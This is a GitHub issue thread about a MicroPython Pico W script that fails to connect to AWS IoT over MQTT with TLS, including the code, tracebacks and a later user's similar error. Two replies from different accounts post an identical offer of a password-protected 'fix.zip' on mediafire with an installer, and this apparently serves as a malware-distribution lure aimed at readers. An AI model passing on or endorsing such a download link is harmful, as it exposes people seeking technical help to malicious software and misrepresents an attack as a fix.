micropython/micropython-lib #915: cannot connect to aws iot using umqtt.simple

Saranya-karan, 2024-08-26:
My code 

import time
import machine
import network
import ujson
from simple1 import MQTTClient

SSID = b'Exxxye'
PASS = b'8xxx766'
CLIENT_ID = b'ixxxxxxxxxxxx6eb63'
AWS_ENDPOINT = b'xxxxx-1.amazonaws.com'

PUB_TOPIC = b'temperature'
SUB_TOPIC = b'temperature'
with open('/pri.der', 'rb') as f:
    DEV_KEY = f.read()
# Thing Certificate
with open('/cert.der', 'rb') as f:
    DEV_CRT = f.read()

light = machine.Pin("LED", machine.Pin.OUT)
light.off()

# Wifi Connection Setup
def wifi_connect():
    print('Connecting to wifi...')
    wlan = network.WLAN(network.STA_IF)
    wlan.active(True)
    wlan.connect(SSID, PASS)
    while wlan.isconnected() == False:
        light.on()
        print('Waiting for connection...')
        time.sleep(0.5)
        light.off()
        time.sleep(0.5)
    print('Connection details: %s' % str(wlan.ifconfig()))

# Callback function for all subscriptions
def mqtt_subscribe_callback(topic, msg):
    print("Received topic: %s message: %s" % (topic, msg))
    if topic == SUB_TOPIC:
        mesg = ujson.loads(msg)
        if 'state' in mesg.keys():
            if mesg['state'] == 'on' or mesg['state'] == 'ON' or mesg['state'] == 'On':
                light.on()
                print('Light is ON')
            else:
                light.off()
                print('Light is OFF')

# Read current temperature from RP2040 embeded sensor
def get_rpi_temperature():
    sensor = machine.ADC(4)
    voltage = sensor.read_u16() * (3.3 / 65535)
    temperature = 27 - (voltage - 0.706) / 0.001721
    return temperature

# Connect to wifi
wifi_connect()

# Set AWS IoT Core connection details
mqtt = MQTTClient(
    client_id=CLIENT_ID,
    server=AWS_ENDPOINT,
    port=8883,
    keepalive=120,
    ssl=True,
    ssl_params={'key':DEV_KEY, 'cert':DEV_CRT, 'server_side':False})

# Establish connection to AWS IoT Core
mqtt.connect()

# Set callback for subscriptions
mqtt.set_callback(mqtt_subscribe_callback)

# Subscribe to topic
mqtt.subscribe(SUB_TOPIC)

# Main loop - with 5 sec delay
while True:
    # Publisg the temperature
    message = b'{"temperature":%s, "temperature_unit":"Degrees Celsius"}' % get_rpi_temperature()
    print('Publishing topic %s message %s' % (PUB_TOPIC, message))
    # QoS Note: 0=Sent zero or more times, 1=Sent at least one, wait for PUBACK
    # See https://docs.aws.amazon.com/iot/latest/developerguide/mqtt.html
    mqtt.publish(topic=PUB_TOPIC, msg=message, qos=1)

    # Check subscriptions for message
    mqtt.check_msg()
    time.sleep(5)

My error code:

Connecting to wifi...
Connection details: ('192.168.x.xx', '255.255.255.0', '192.168.xx.xx', '192.168.xx.xx')
dbug-msg: 0x9 b'04:4d:51:54:54:04:02:00:78'
dbug-resp: b''
Traceback (most recent call last):
  File "<stdin>", line 81, in <module>
  File "simple1.py", line 92, in connect
IndexError: bytes index out of range

please someone help me on this..i tried everything

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

seeronline, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

kllsamui, 2024-09-23:
try first time MicroPython 
MQTT TLS ( ssl=True)
and can not connect

# env: MicroPython v1.23.0 on 2024-06-02; Raspberry Pi Pico W with RP2040
# also test: MicroPython v1.24.0-preview.335.gb08ddbba5 on 2024-09-20; Raspberry Pi Pico W with RP2040

from umqtt.simple import MQTTClient # Metadata-Version: 2.1 Name: umqtt.simple Version: 1.4.0

error:
# Traceback (most recent call last):
#   File "<stdin>", line 47, in <module>
#   File "/lib/umqtt/simple.py", line 68, in connect
# AttributeError: 'bool' object has no attribute 'wrap_socket'

do i need a other /lib/ ?

kllsamui, 2024-09-23:
no, a better code did it:
[image]